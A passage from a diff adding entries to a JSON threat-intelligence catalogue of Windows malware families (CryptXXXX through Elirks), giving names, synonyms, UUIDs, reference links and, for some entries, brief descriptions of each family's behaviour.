"2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", + "value": "CryptoRansomeware", + 
"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", + "value": "CryptXXXX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", + "value": "CsExt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Windshield?" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", + "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451" + ] + }, + "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", + "value": "Cuegoe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", + "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" + ] + }, + "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", + "value": "Cueisfry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", + "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" + ] + }, + "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", + "value": "Cutlet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" + ] + }, + "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", + "value": "Cutwail", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Rebhip" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ] + }, + "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", + "value": "CyberGate", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" + ] + }, + "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", + "value": "CyberSplitter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", + "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" + ] + }, + "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", + "value": "CycBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", + "value": "Dairy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", + "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + 
"https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" + ] + }, + "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", + "value": "DanaBot", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. " + }, + { + "meta": { + "synonyms": [ + "Fynloski", + "klovbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", + "https://darkcomet.net", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", + "value": "DarkComet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", + "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html", + "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html" + ] + }, + "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", + "value": "DarkMegi", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chymine" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", + "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", + 
"http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", + "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml" + ] + }, + "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", + "value": "Darkmoon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" + ] + }, + "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", + "value": "DarkPulsar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", + "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" + ] + }, + "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", + "value": "DarkShell", + "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", + "https://blog.radware.com/security/2018/02/darksky-botnet/", + "http://telegra.ph/Analiz-botneta-DarkSky-12-30", + "https://github.com/ims0rry/DarkSky-botnet" + ] + }, + "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", + "value": "Darksky", + "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. 
The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", + "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" + ] + }, + "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", + "value": "DarkStRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", + "https://securelist.com/dark-tequila-anejo/87528/" + ] + }, + "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", + "value": "DarkTequila", + "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", + "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", + "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" + ] + }, + "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", + "value": "Darktrack RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Muirim", + "Nioupale" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ] + }, + "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", + "value": "Daserf", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html" + ] + }, + "uuid": "827490bf-19b8-4d14-83b3-7da67fbe436c", + "value": "Datper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkong", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "cae8384d-b01b-4f9c-a31b-f693e12ea6b2", + "value": "DDKONG", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", + "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", + "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", + "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" + ] + }, + "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", + "value": "Decebal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", + "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" + ] + }, + "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", + "value": "Delta(Alfa,Bravo, ...)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" + ] + }, + "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", + "value": "Dented", + "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", + "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" + ] + }, + "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", + "value": "DeputyDog", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", + "https://twitter.com/struppigel/status/812601286088597505" + ] + }, + "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", + "value": "DeriaLock", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", + "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" + ] + }, + "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", + "value": "Derusbi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" + ] + }, + "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", + "value": "Devil's Rat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "LusyPOS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", + "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", + "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", + 
"http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/", + "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html" + ] + }, + "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", + "value": "Dexter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.de_loader", + "https://blog.fortinet.com/2016/06/21/the-curious-case-of-an-unknown-trojan-targeting-german-speaking-users", + "https://blogs.forcepoint.com/security-labs/zeus-delivered-deloader-defraud-customers-canadian-banks", + "https://int0xcc.svbtle.com/dissecting-obfuscated-deloader-malware" + ] + }, + "uuid": "d0c6df05-8d89-4ce8-8ea2-8a4f617fa8f2", + "value": "DE Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crysis", + "Arena" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", + "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" + ] + }, + "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", + "value": "Dharma", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crystal", + "Gorynych", + "Gorynch" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", + "https://www.scmagazine.com/inside-diamondfox/article/578478/", + "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", + "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", + "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", + "https://blog.cylance.com/a-study-in-bots-diamondfox" + ] + }, + "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", + "value": "DiamondFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" + ] + }, + "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", + "value": "Dimnie", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", + "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", + "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" + ] + }, + "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", + "value": "DirCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", + "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", + "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html" + ] + }, + "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", + "value": "DistTrack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", + "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" + ] + }, + "uuid": 
"1248cdf7-4180-4098-b1d0-389aa523a0ed", + "value": "DMA Locker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", + "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", + "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", + "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" + ] + }, + "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", + "value": "DNSMessenger", + "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." + }, + { + "meta": { + "synonyms": [ + "Shelma" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", + "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" + ] + }, + "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", + "value": "DogHousePower", + "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", + "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", + "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", + "https://research.checkpoint.com/dorkbot-an-investigation/" + ] + }, + "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", + "value": "NgrBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + ] + }, + "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", + "value": "Dorshel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", + "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", + "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", + "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" + ] + }, + "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", + "value": "DoublePulsar", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DELPHACY" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" + ] + }, + "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", + "value": "Downdelph", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", + 
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" + ] + }, + "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", + "value": "Downeks", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", + "http://www.clearskysec.com/charmingkitten/" + ] + }, + "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", + "value": "DownPaper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" + ] + }, + "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", + "value": "DramNudge", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", + "https://lokalhost.pl/gozi_tree.txt", + "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + ] + }, + "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", + "value": "DreamBot", + "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", + "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", + "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", + "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", + "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", + "https://viql.github.io/dridex/", + "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + ] + }, + "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", + "value": "Dridex", + "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. 
AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", + "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" + ] + }, + "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", + "value": "DROPSHOT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" + ] + }, + "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", + "value": "DtBackdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", + "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", + "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", + "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", + "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", + 
"https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/"
+ ]
+ },
+ "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf",
+ "value": "DarkHotel",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute",
+ "https://github.com/ch0sys/DUBrute"
+ ]
+ },
+ "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad",
+ "value": "DUBrute",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador"
+ ]
+ },
+ "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5",
+ "value": "Dumador",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf"
+ ]
+ },
+ "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6",
+ "value": "DuQu",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer",
+ "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group"
+ ]
+ },
+ "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7",
+ "value": "Duuzer",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Dyreza"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre",
+ "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/",
+ "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates",
+ "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf"
+ ]
+ },
+ "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395",
+ "value": "Dyre",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom",
+ "https://twitter.com/JaromirHorejsi/status/815861135882780673"
+ ]
+ },
+ "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254",
+ "value": "EDA2",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel",
+ "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
+ ]
+ },
+ "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
+ "value": "EHDevel",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks",
+ "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/"
+ ]
+ },
+ "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9",
+ "value": "Elirks",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
